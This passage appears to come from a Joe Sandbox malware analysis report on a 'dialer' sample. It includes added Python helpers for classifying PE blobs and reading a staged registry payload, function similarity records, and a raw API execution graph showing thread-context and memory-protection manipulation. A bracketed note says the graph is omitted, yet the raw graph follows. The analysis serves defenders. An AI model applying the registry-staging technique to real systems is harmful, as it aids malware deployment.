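    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return {"is_pe": False, "reason": "no PE signature"}
    machine, _nsec, _ts, _symp, _nsym, opt_size, chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if opt + opt_size > len(data) or opt_size < 2:
        return {"is_pe": False, "reason": "truncated optional header"}
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x20B:    # PE32+: data directories start at offset 112
        nrva_off, dir_off = opt + 108, opt + 112
    elif magic == 0x10B:  # PE32: data directories start at offset 96
        nrva_off, dir_off = opt + 92, opt + 96
    else:
        return {"is_pe": False, "reason": "unknown optional header magic"}
    clr_rva = clr_size = 0
    try:
        nrva = struct.unpack_from("<I", data, nrva_off)[0]
        if nrva > CLR_DIRECTORY_INDEX:
            clr_rva, clr_size = struct.unpack_from(
                "<II", data, dir_off + CLR_DIRECTORY_INDEX * 8)
    except struct.error:
        return {"is_pe": False, "reason": "truncated data directories"}
    return {
        "is_pe": True,
        "machine": machine,
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "managed": clr_rva != 0 and clr_size != 0,
    }


def build_sample_pe(managed: bool) -> bytes:
    """Constructed minimal PE32+ header for the example: no sections, sixteen
    data directories, CLR directory filled in when managed=True."""
    opt_size = 112 + 16 * 8
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)          # e_lfanew
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0", IMAGE_FILE_MACHINE_AMD64,
                       0, 0, 0, 0, opt_size, 0x0022)  # EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)             # PE32+ magic
    struct.pack_into("<I", opt, 108, 16)              # NumberOfRvaAndSizes
    if managed:
        struct.pack_into("<II", opt, 112 + CLR_DIRECTORY_INDEX * 8, 0x2008, 0x48)
    return bytes(dos) + coff + bytes(opt)


def read_staged_value(subkey: str = "SOFTWARE", value: str = "dialerstager") -> Optional[bytes]:
    """Windows only: fetch the value the stager reads; None when it is absent
    or not stored as bytes.  Assumption: the value holds the raw image."""
    import winreg  # unavailable off Windows, hence the local import
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey) as key:
            data, _kind = winreg.QueryValueEx(key, value)
    except FileNotFoundError:
        return None
    return bytes(data) if isinstance(data, (bytes, bytearray)) else None


if __name__ == "__main__":
    samples = (("managed", build_sample_pe(True)),
               ("native", build_sample_pe(False)),
               ("text", b"not a pe"))
    for label, blob in samples:
        print(label, classify_blob(blob))
```

On a live host, `read_staged_value()` followed by `classify_blob()` tells you whether the staged payload is a managed image ready for Assembly.Load or something that still needs decoding; a value that is present but is not a PE is still worth keeping, since the stager may transform it before loading.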

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000003F.00000002.2210644819.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000003F.00000002.2210602655.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000003F.00000002.2210680875.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000003F.00000002.2210680875.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                          • String ID:
                                                          • API String ID: 4184240511-0
                                                          • Opcode ID: 28fc60779f0ad9d62090849b4b365cf4f04873247535d29ba999af650a69468a
                                                          • Instruction ID: 67cbc857c72eec62a5b69ac69888ab56890e3342390bd1f27bc6256027a28dd6
                                                          • Opcode Fuzzy Hash: 28fc60779f0ad9d62090849b4b365cf4f04873247535d29ba999af650a69468a
                                                          • Instruction Fuzzy Hash: 5E413972704A458AEB11CF7AE8543DD73B1FB89B99F449226AF4A47A69DF38C149C300

                                                          Control-flow Graph

                                                          (graph legend: Executed / Not Executed)
                                                          control_flow_graph 168 140001c0c-140001c47 lstrlenW call 140001070 171 140001c49-140001c58 StrStrIW 168->171 172 140001c7c-140001c99 168->172 171->172 173 140001c5a 171->173 174 140001c5d-140001c7a StrStrIW 173->174 174->172 174->174
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000003F.00000002.2210644819.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000003F.00000002.2210602655.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000003F.00000002.2210680875.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000003F.00000002.2210680875.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID:
                                                          • API String ID: 1659193697-0
                                                          • Opcode ID: b9962e4e84025f74c7544eb618daec881cae5e6da44291651d3163d6fd35675d
                                                          • Instruction ID: 09bf7b72404f13f14ced639d6c0c6f67ee10a0461fa6ddbcf4aeef183f1f47ff
                                                          • Opcode Fuzzy Hash: b9962e4e84025f74c7544eb618daec881cae5e6da44291651d3163d6fd35675d
                                                          • Instruction Fuzzy Hash: 9B0116B6344B8185EA66CF13A804BA963AAF78CFC0F598131AE4D83765DF38D946C740

                                                          Control-flow Graph

                                                          (graph legend: Executed / Not Executed)
                                                          control_flow_graph 175 140001970-14000197b call 140001984 ExitProcess
                                                          APIs
                                                            • Part of subcall function 0000000140001984: FindResourceExA.KERNEL32(?,?,?,?,?,0000000140001979), ref: 000000014000199C
                                                            • Part of subcall function 0000000140001984: SizeofResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019B3
                                                            • Part of subcall function 0000000140001984: LoadResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019C8
                                                            • Part of subcall function 0000000140001984: LockResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019DA
                                                            • Part of subcall function 0000000140001984: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A04
                                                            • Part of subcall function 0000000140001984: RegSetValueExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A2A
                                                          • ExitProcess.KERNEL32 ref: 000000014000197B
                                                          Memory Dump Source
                                                          • Source File: 0000003F.00000002.2210644819.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003F.00000002.2210602655.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2210680875.0000000140002000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2210680875.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
                                                          • String ID:
                                                          • API String ID: 3836967525-0
                                                          • Opcode ID: ee2a5ee51357348344ca81a4be59069b68ca976694f2d9a0ce0cc3fee0d6cd3e
                                                          • Instruction ID: 591ae2b672e41714171671f8838f177bfce947d6885aae7fa81f753db4d17b5a
                                                          • Opcode Fuzzy Hash: ee2a5ee51357348344ca81a4be59069b68ca976694f2d9a0ce0cc3fee0d6cd3e
                                                          • Instruction Fuzzy Hash: 71A011B0A00A8082EA0ABBB2282A3E802200B88380F000000A202032A2CC38008A8A00

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 187 14000114c-140001165 GetModuleHandleA 188 140001174-140001178 187->188 189 140001167-14000116e GetProcAddress 187->189 189->188
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000003F.00000002.2210644819.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003F.00000002.2210602655.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2210680875.0000000140002000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2210680875.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: RtlGetVersion$ntdll.dll
                                                          • API String ID: 1646373207-1489217083
                                                          • Opcode ID: cbe8274689d4b13bee11112ce4758f47015ade9fc57dadff247276a17ec4a5cd
                                                          • Instruction ID: 59613ef8418529ec4bc26aae3d36b02baf67a4f8cd1ada14fad478f70e9913c3
                                                          • Opcode Fuzzy Hash: cbe8274689d4b13bee11112ce4758f47015ade9fc57dadff247276a17ec4a5cd
                                                          • Instruction Fuzzy Hash: 8CD0E9F5622A01E1EA0BEB57FC553D512617B5C781F804521E70A43671EF3C8659C700
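The per-function records above (API list, String ID, Opcode ID, fuzzy hashes) are the keys an analyst pivots on to match this module's functions against other samples. The Python below is an example added here, not Joe Sandbox's own code; it parses records in that text layout into structured objects and flags two call patterns present in the two functions above: a resource blob written to the registry (FindResourceExA/LoadResource/LockResource followed by RegSetValueExW) and an ntdll export resolved by name (GetModuleHandleA/GetProcAddress with the string ntdll.dll). The input is a constructed, trimmed copy of those two records; the pattern names, the record layout assumptions and the parser itself are the example's own.

```python
"""Parse Joe Sandbox per-function APIs/Similarity records into pivot keys.

Example added to the report page; not Joe Sandbox code. Assumes the text layout
seen above: a 'control_flow_graph' line opens a record, API lines are bullets
('• Name.DLL ref:' or '• Part of subcall function ADDR: Name.DLL('), and the
Similarity block is '• Key: value' bullets. Pattern names are this example's own.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: trimmed copy of the two function records on this page.
SAMPLE = """\
control_flow_graph 175 140001970-14000197b call 140001984 ExitProcess
APIs
  • Part of subcall function 0000000140001984: FindResourceExA.KERNEL32(?,?,?,?,?,0000000140001979), ref: 000000014000199C
  • Part of subcall function 0000000140001984: LoadResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019C8
  • Part of subcall function 0000000140001984: LockResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019DA
  • Part of subcall function 0000000140001984: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A04
  • Part of subcall function 0000000140001984: RegSetValueExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A2A
• ExitProcess.KERNEL32 ref: 000000014000197B
Similarity
• API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
• String ID:
• API String ID: 3836967525-0
• Instruction Fuzzy Hash: 71A011B0A00A8082EA0ABBB2282A3E802200B88380F000000A202032A2CC38008A8A00
control_flow_graph 187 14000114c-140001165 GetModuleHandleA 188 140001174-140001178 187->188 189 140001167-14000116e GetProcAddress 187->189 189->188
APIs
Strings
Similarity
• API ID: AddressHandleModuleProc
• String ID: RtlGetVersion$ntdll.dll
• API String ID: 1646373207-1489217083
• Instruction Fuzzy Hash: 8CD0E9F5622A01E1EA0BEB57FC553D512617B5C781F804521E70A43671EF3C8659C700
"""

_CFG_RE = re.compile(r"^control_flow_graph\s+\d+\s+([0-9a-fA-F]+)-")
_LABEL_RE = re.compile(r"[A-Za-z_]\w*")  # CFG node labels that name an API
_SUBCALL_API_RE = re.compile(r"Part of subcall function\s+([0-9a-fA-F]+):\s*(\w+)\.(\w+)\(")
_DIRECT_API_RE = re.compile(r"^[•*-]?\s*(\w+)\.(\w+)\s+ref:")
_FIELD_RE = re.compile(r"^[•*-]?\s*([A-Za-z][A-Za-z ]*?):\s*(.*)$")

# Hypothetical pattern definitions for this example (not Joe Sandbox signatures).
RESOURCE_APIS = {"FindResourceA", "FindResourceW", "FindResourceExA", "FindResourceExW",
                 "LoadResource", "LockResource"}
REG_WRITE_APIS = {"RegSetValueExA", "RegSetValueExW", "RegSetValueA", "RegSetValueW"}


@dataclass
class FuncRecord:
    start: int                                   # function start address
    apis: list = field(default_factory=list)     # deduplicated, in listing order
    subcalls: set = field(default_factory=set)   # callee addresses the APIs came from
    strings: list = field(default_factory=list)  # String ID split on '$'
    fields: dict = field(default_factory=dict)   # API ID, fuzzy hashes, ...

    def add_api(self, name):
        if name not in self.apis:
            self.apis.append(name)

    def flags(self):
        found = set(self.apis)
        out = []
        if found & RESOURCE_APIS and found & REG_WRITE_APIS:
            out.append("resource-to-registry")
        if "GetProcAddress" in found and any(s.lower() == "ntdll.dll" for s in self.strings):
            out.append("resolves-ntdll-export")
        return out


def parse_report(text):
    """Return one FuncRecord per control_flow_graph record in the text."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = _CFG_RE.match(line)
        if m:
            cur = FuncRecord(start=int(m.group(1), 16))
            records.append(cur)
            # Node labels on the CFG line name APIs called inline (e.g. GetProcAddress).
            for tok in line.split()[3:]:
                if _LABEL_RE.fullmatch(tok) and tok != "call":
                    cur.add_api(tok)
            continue
        if cur is None:
            continue
        m = _SUBCALL_API_RE.search(line)
        if m:
            cur.subcalls.add(int(m.group(1), 16))
            cur.add_api(m.group(2))
            continue
        m = _DIRECT_API_RE.match(line)
        if m:
            cur.add_api(m.group(1))
            continue
        m = _FIELD_RE.match(line)
        if m:
            key, value = m.group(1), m.group(2).strip()
            if key == "String ID":
                cur.strings = [s for s in value.split("$") if s]
            else:
                cur.fields[key] = value
    return records


def summarize(records):
    """Compact dicts suitable for a pivot table or JSON export."""
    return [{"start": f"0x{r.start:x}", "apis": r.apis, "strings": r.strings,
             "flags": r.flags(), "ifh": r.fields.get("Instruction Fuzzy Hash")}
            for r in records]


if __name__ == "__main__":
    for row in summarize(parse_report(SAMPLE)):
        print(row)
```

The Instruction Fuzzy Hash and API ID fields are kept verbatim so they can be joined against the same fields in other reports; the flag names only mark the two call patterns visible on this page and are not a verdict on the function.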

                                                          Execution Graph

                                                          Execution Coverage:1.3%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:1408
                                                          Total number of Limit Nodes:9
[Execution graph: rendered in the original report as an interactive graph (1408 nodes, 9 limit nodes, 1.3% execution coverage); the serialized node/edge list is not reproduced here and is truncated at the end of the page. Node labels lie in the 0x2d6f151xxxx address range and name the following Windows APIs and CRT-internal routines:
• memory: VirtualAlloc, VirtualQuery, VirtualProtect, HeapAlloc, HeapFree, GetProcessHeap
• dynamic resolution: GetModuleHandleA, GetProcAddress, LoadLibraryExW, FreeLibrary
• CRT/TLS and locking: FlsGetValue, FlsSetValue, TlsAlloc, TlsGetValue, TlsSetValue, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection
• exception handling and termination: RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, RtlUnwindEx, RaiseException, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, GetCurrentProcess, TerminateProcess
• file, path and directory enumeration: NtQueryDirectoryFileEx, GetFileType, GetFinalPathNameByHandleW, PathCombineW, StrCpyW, StrCatW, StrCmpIW, StrCmpW, StrCmpNIW, lstrlenW (e.g. the function at 2d6f1512604 calls NtQueryDirectoryFileEx and then compares the returned names with StrCmpNIW/StrCmpIW before returning)
• environment and code page: GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WideCharToMultiByte, MultiByteToWideChar, GetOEMCP, GetACP, IsValidCodePage, GetCPInfo
• timing, identity and error state: GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, IsProcessorFeaturePresent, GetLastError, SetLastError
• CRT-internal labels: _invalid_parameter_noinfo, __free_lconv_mon, _log10_special, _CreateFrameInfo, __vcrt_FlsAlloc, __vcrt_uninitialize_ptd, __vcrt_uninitialize_locks, __std_exception_copy, std::bad_alloc::bad_alloc, Concurrency::cancel_current_task, __CxxCallCatchBlock, __GSHandlerCheckCommon, __scrt_dllmain_exception_filter, _raise_exc, _clrfp]
2d6f1519d74 __GetUnwindTryBlock RtlLookupFunctionEntry 8328->8329 8330 2d6f151b87e 8329->8330 8400 2d6f151a4fc 8330->8400 8333 2d6f151b890 __FrameHandler3::GetHandlerSearchState 8403 2d6f151a534 8333->8403 8334 2d6f151b8b3 8335 2d6f151a4fc __GetUnwindTryBlock RtlLookupFunctionEntry 8334->8335 8336 2d6f151a9d6 8335->8336 8336->8261 8336->8263 8336->8267 8339 2d6f1519a64 _CreateFrameInfo 9 API calls 8338->8339 8340 2d6f151a162 8339->8340 8340->8261 8340->8294 8342 2d6f151b9c3 8341->8342 8347 2d6f151b907 8341->8347 8343 2d6f151aaa2 8343->8263 8343->8310 8344 2d6f151a128 9 API calls 8344->8347 8345 2d6f151a114 Is_bad_exception_allowed 9 API calls 8345->8347 8346 2d6f151b068 9 API calls 8346->8347 8347->8343 8347->8344 8347->8345 8347->8346 8349 2d6f151ba39 8348->8349 8351 2d6f151b9e9 Is_bad_exception_allowed 8348->8351 8349->8314 8350 2d6f151a114 9 API calls Is_bad_exception_allowed 8350->8351 8351->8349 8351->8350 8353 2d6f151b095 8352->8353 8364 2d6f151b124 8352->8364 8354 2d6f151a114 Is_bad_exception_allowed 9 API calls 8353->8354 8355 2d6f151b09e 8354->8355 8356 2d6f151a114 Is_bad_exception_allowed 9 API calls 8355->8356 8357 2d6f151b0b7 8355->8357 8355->8364 8356->8357 8358 2d6f151b0e3 8357->8358 8359 2d6f151a114 Is_bad_exception_allowed 9 API calls 8357->8359 8357->8364 8360 2d6f151a128 9 API calls 8358->8360 8359->8358 8361 2d6f151b0f7 8360->8361 8362 2d6f151b110 8361->8362 8363 2d6f151a114 Is_bad_exception_allowed 9 API calls 8361->8363 8361->8364 8365 2d6f151a128 9 API calls 8362->8365 8363->8362 8364->8307 8365->8364 8367 2d6f1519d74 __GetUnwindTryBlock RtlLookupFunctionEntry 8366->8367 8368 2d6f151a8dd 8367->8368 8369 2d6f151a114 Is_bad_exception_allowed 9 API calls 8368->8369 8370 2d6f151a915 8369->8370 8371 2d6f1519f80 9 API calls 8370->8371 8372 2d6f151a959 8371->8372 8372->8307 8374 2d6f1519cf8 __FrameHandler3::ExecutionInCatch 8373->8374 8375 2d6f1519c80 __FrameHandler3::ExecutionInCatch 9 API calls 8374->8375 8376 2d6f1519d02 8375->8376 8376->8278 8378 
2d6f1517d70 _log10_special 8 API calls 8377->8378 8379 2d6f151a07a 8378->8379 8379->8302 8381 2d6f151ae82 8380->8381 8386 2d6f151aef0 8380->8386 8382 2d6f1519a64 _CreateFrameInfo 9 API calls 8381->8382 8383 2d6f151ae87 8382->8383 8384 2d6f151ae96 EncodePointer 8383->8384 8390 2d6f151aeec 8383->8390 8385 2d6f1519a64 _CreateFrameInfo 9 API calls 8384->8385 8387 2d6f151aea6 8385->8387 8386->8302 8387->8390 8406 2d6f1519c2c 8387->8406 8389 2d6f151a8a0 19 API calls 8389->8390 8390->8386 8390->8389 8391 2d6f151a114 9 API calls Is_bad_exception_allowed 8390->8391 8391->8390 8393 2d6f15198ef 8392->8393 8394 2d6f1519918 RtlPcToFileHeader 8393->8394 8395 2d6f151993a RaiseException 8393->8395 8396 2d6f1519930 8394->8396 8395->8312 8396->8395 8398 2d6f151d258 _invalid_parameter_noinfo 23 API calls 8397->8398 8399 2d6f151cae1 8398->8399 8401 2d6f1519d74 __GetUnwindTryBlock RtlLookupFunctionEntry 8400->8401 8402 2d6f151a50f 8401->8402 8402->8333 8402->8334 8404 2d6f1519d74 __GetUnwindTryBlock RtlLookupFunctionEntry 8403->8404 8405 2d6f151a54e 8404->8405 8405->8336 8407 2d6f1519a64 _CreateFrameInfo 9 API calls 8406->8407 8408 2d6f1519c58 8407->8408 8408->8390 8009 2d6f151f72c 8010 2d6f151f76b 8009->8010 8011 2d6f151f74e 8009->8011 8013 2d6f151f775 8010->8013 8018 2d6f1521ee8 8010->8018 8011->8010 8012 2d6f151f75c 8011->8012 8014 2d6f151dadc __free_lconv_mon 11 API calls 8012->8014 8025 2d6f1521f24 8013->8025 8017 2d6f151f761 _invalid_parameter_noinfo 8014->8017 8019 2d6f1521f0a HeapSize 8018->8019 8020 2d6f1521ef1 8018->8020 8021 2d6f151dadc __free_lconv_mon 11 API calls 8020->8021 8022 2d6f1521ef6 8021->8022 8023 2d6f151d9a0 _invalid_parameter_noinfo 49 API calls 8022->8023 8024 2d6f1521f01 8023->8024 8024->8013 8026 2d6f1521f39 8025->8026 8027 2d6f1521f43 8025->8027 8037 2d6f151ce3c 8026->8037 8029 2d6f1521f48 8027->8029 8035 2d6f1521f4f __free_lconv_mon 8027->8035 8030 2d6f151db74 __free_lconv_mon 11 API calls 8029->8030 8033 2d6f1521f41 8030->8033 8031 2d6f1521f55 8034 
2d6f151dadc __free_lconv_mon 11 API calls 8031->8034 8032 2d6f1521f82 HeapReAlloc 8032->8033 8032->8035 8033->8017 8034->8033 8035->8031 8035->8032 8036 2d6f151bc8c __free_lconv_mon 2 API calls 8035->8036 8036->8035 8038 2d6f151ce87 8037->8038 8039 2d6f151ce4b __free_lconv_mon 8037->8039 8041 2d6f151dadc __free_lconv_mon 11 API calls 8038->8041 8039->8038 8040 2d6f151ce6e HeapAlloc 8039->8040 8043 2d6f151bc8c __free_lconv_mon 2 API calls 8039->8043 8040->8039 8042 2d6f151ce85 8040->8042 8041->8042 8042->8033 8043->8039 8756 2d6f152522d 8757 2d6f151a0c0 __CxxCallCatchBlock 9 API calls 8756->8757 8761 2d6f1525240 8757->8761 8758 2d6f152527f __CxxCallCatchBlock 8759 2d6f1519a64 _CreateFrameInfo 9 API calls 8758->8759 8760 2d6f1525293 8759->8760 8762 2d6f1519a64 _CreateFrameInfo 9 API calls 8760->8762 8761->8758 8764 2d6f1519750 __CxxCallCatchBlock 9 API calls 8761->8764 8763 2d6f15252a3 8762->8763 8764->8758 8409 2d6f1512fac 8410 2d6f1512fd3 8409->8410 8411 2d6f15130a0 8410->8411 8412 2d6f1512ff0 PdhGetCounterInfoW 8410->8412 8412->8411 8413 2d6f1513012 GetProcessHeap HeapAlloc PdhGetCounterInfoW 8412->8413 8414 2d6f151308c GetProcessHeap HeapFree 8413->8414 8415 2d6f1513044 StrCmpW 8413->8415 8414->8411 8415->8414 8417 2d6f1513059 8415->8417 8417->8414 8418 2d6f1513554 StrCmpNW 8417->8418 8419 2d6f1513586 StrStrW 8418->8419 8422 2d6f15135f6 8418->8422 8420 2d6f151359f StrToIntW 8419->8420 8419->8422 8421 2d6f15135c7 8420->8421 8420->8422 8421->8422 8428 2d6f1511934 OpenProcess 8421->8428 8422->8417 8425 2d6f1513c74 StrCmpNIW 8426 2d6f15135e8 8425->8426 8426->8422 8427 2d6f1511c00 2 API calls 8426->8427 8427->8422 8429 2d6f1511968 K32GetModuleFileNameExW 8428->8429 8430 2d6f15119ba 8428->8430 8431 2d6f15119b1 CloseHandle 8429->8431 8432 2d6f1511982 PathFindFileNameW lstrlenW 8429->8432 8430->8422 8430->8425 8431->8430 8432->8431 8433 2d6f15119a0 StrCpyW 8432->8433 8433->8431 8044 2d6f1512334 GetProcessIdOfThread GetCurrentProcessId 8045 2d6f15123da 8044->8045 8046 
2d6f151235f CreateFileW 8044->8046 8046->8045 8047 2d6f1512393 WriteFile ReadFile CloseHandle 8046->8047 8047->8045 9101 2d6f15252b3 9104 2d6f15197a4 9101->9104 9105 2d6f15197bc 9104->9105 9106 2d6f15197ce 9104->9106 9105->9106 9107 2d6f15197c4 9105->9107 9108 2d6f1519a64 _CreateFrameInfo 9 API calls 9106->9108 9109 2d6f15197cc 9107->9109 9111 2d6f1519a64 _CreateFrameInfo 9 API calls 9107->9111 9110 2d6f15197d3 9108->9110 9110->9109 9113 2d6f1519a64 _CreateFrameInfo 9 API calls 9110->9113 9112 2d6f15197f3 9111->9112 9114 2d6f1519a64 _CreateFrameInfo 9 API calls 9112->9114 9113->9109 9115 2d6f1519800 9114->9115 9116 2d6f151cad8 23 API calls 9115->9116 9117 2d6f1519809 9116->9117 9118 2d6f151cad8 23 API calls 9117->9118 9119 2d6f1519815 9118->9119 9120 2d6f1520698 9121 2d6f15206c2 9120->9121 9122 2d6f151dafc __free_lconv_mon 11 API calls 9121->9122 9123 2d6f15206e1 9122->9123 9124 2d6f151db74 __free_lconv_mon 11 API calls 9123->9124 9125 2d6f15206ef 9124->9125 9126 2d6f151dafc __free_lconv_mon 11 API calls 9125->9126 9129 2d6f1520719 9125->9129 9128 2d6f152070b 9126->9128 9127 2d6f151fa3c 6 API calls 9127->9129 9130 2d6f151db74 __free_lconv_mon 11 API calls 9128->9130 9129->9127 9131 2d6f1520722 9129->9131 9130->9129 8765 2d6f151fc1c 8766 2d6f151fc55 8765->8766 8768 2d6f151fc26 8765->8768 8767 2d6f151fc3b FreeLibrary 8767->8768 8768->8766 8768->8767 7609 2d6f151211c NtQuerySystemInformation 7610 2d6f1512158 7609->7610 7611 2d6f151222e 7610->7611 7612 2d6f1512263 7610->7612 7620 2d6f1512171 7610->7620 7613 2d6f15122d7 7612->7613 7614 2d6f1512268 7612->7614 7613->7611 7616 2d6f15122dc 7613->7616 7629 2d6f15131cc GetProcessHeap HeapAlloc 7614->7629 7617 2d6f15131cc 11 API calls 7616->7617 7621 2d6f1512280 7617->7621 7618 2d6f15121a9 StrCmpNIW 7618->7620 7619 2d6f15121d0 7619->7620 7623 2d6f1511c34 7619->7623 7620->7611 7620->7618 7620->7619 7621->7611 7624 2d6f1511cb8 7623->7624 7625 2d6f1511c5b GetProcessHeap HeapAlloc 7623->7625 7624->7619 7625->7624 7626 2d6f1511c96 
7625->7626 7635 2d6f1511c00 7626->7635 7633 2d6f151321f 7629->7633 7630 2d6f15132dd GetProcessHeap HeapFree 7630->7621 7631 2d6f15132d8 7631->7630 7632 2d6f151326a StrCmpNIW 7632->7633 7633->7630 7633->7631 7633->7632 7634 2d6f1511c34 6 API calls 7633->7634 7634->7633 7636 2d6f1511c17 7635->7636 7637 2d6f1511c20 GetProcessHeap HeapFree 7635->7637 7638 2d6f151152c 2 API calls 7636->7638 7637->7624 7638->7637 8769 2d6f1520020 8772 2d6f151ffd8 8769->8772 8777 2d6f151cdcc EnterCriticalSection 8772->8777 8434 2d6f151bfa1 8435 2d6f151cad8 23 API calls 8434->8435 8436 2d6f151bfa6 8435->8436 8437 2d6f151c017 8436->8437 8438 2d6f151bfcd GetModuleHandleW 8436->8438 8451 2d6f151bea4 8437->8451 8438->8437 8444 2d6f151bfda 8438->8444 8444->8437 8446 2d6f151c0c8 GetModuleHandleExW 8444->8446 8447 2d6f151c0fc GetProcAddress 8446->8447 8448 2d6f151c10e 8446->8448 8447->8448 8449 2d6f151c12a FreeLibrary 8448->8449 8450 2d6f151c131 8448->8450 8449->8450 8450->8437 8465 2d6f151cdcc EnterCriticalSection 8451->8465 8059 2d6f1516120 8060 2d6f151612d 8059->8060 8061 2d6f1516139 8060->8061 8062 2d6f151624a 8060->8062 8063 2d6f15161bd 8061->8063 8064 2d6f1516196 SetThreadContext 8061->8064 8065 2d6f151632e 8062->8065 8066 2d6f1516271 VirtualProtect FlushInstructionCache 8062->8066 8064->8063 8067 2d6f151634e 8065->8067 8075 2d6f1514810 8065->8075 8066->8062 8079 2d6f1515220 GetCurrentProcess 8067->8079 8070 2d6f15163a7 8073 2d6f1517d70 _log10_special 8 API calls 8070->8073 8071 2d6f1516367 ResumeThread 8072 2d6f1516353 8071->8072 8072->8070 8072->8071 8074 2d6f15163ef 8073->8074 8077 2d6f151482c 8075->8077 8076 2d6f151488f 8076->8067 8077->8076 8078 2d6f1514842 VirtualFree 8077->8078 8078->8077 8080 2d6f151523c 8079->8080 8081 2d6f1515283 8080->8081 8082 2d6f1515252 VirtualProtect FlushInstructionCache 8080->8082 8081->8072 8082->8080 8476 2d6f15241c8 8477 2d6f15241d9 CloseHandle 8476->8477 8478 2d6f15241df 8476->8478 8477->8478 9132 2d6f15252c9 9133 2d6f1519a64 _CreateFrameInfo 9 API 
calls 9132->9133 9134 2d6f15252d7 9133->9134 9135 2d6f15252e2 9134->9135 9136 2d6f1519a64 _CreateFrameInfo 9 API calls 9134->9136 9136->9135 7504 2d6f1511ac8 7511 2d6f1511628 GetProcessHeap HeapAlloc 7504->7511 7506 2d6f1511ad7 7507 2d6f1511ade SleepEx 7506->7507 7510 2d6f1511598 StrCmpIW StrCmpW 7506->7510 7562 2d6f15118b4 7506->7562 7508 2d6f1511628 50 API calls 7507->7508 7508->7506 7510->7506 7579 2d6f1511268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7511->7579 7513 2d6f1511650 7580 2d6f1511000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7513->7580 7515 2d6f1511658 7581 2d6f1511268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7515->7581 7517 2d6f1511661 7582 2d6f1511268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7517->7582 7519 2d6f151166a 7583 2d6f1511268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7519->7583 7521 2d6f1511673 7584 2d6f1511000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7521->7584 7523 2d6f151167c 7585 2d6f1511000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7523->7585 7525 2d6f1511685 7586 2d6f1511000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7525->7586 7527 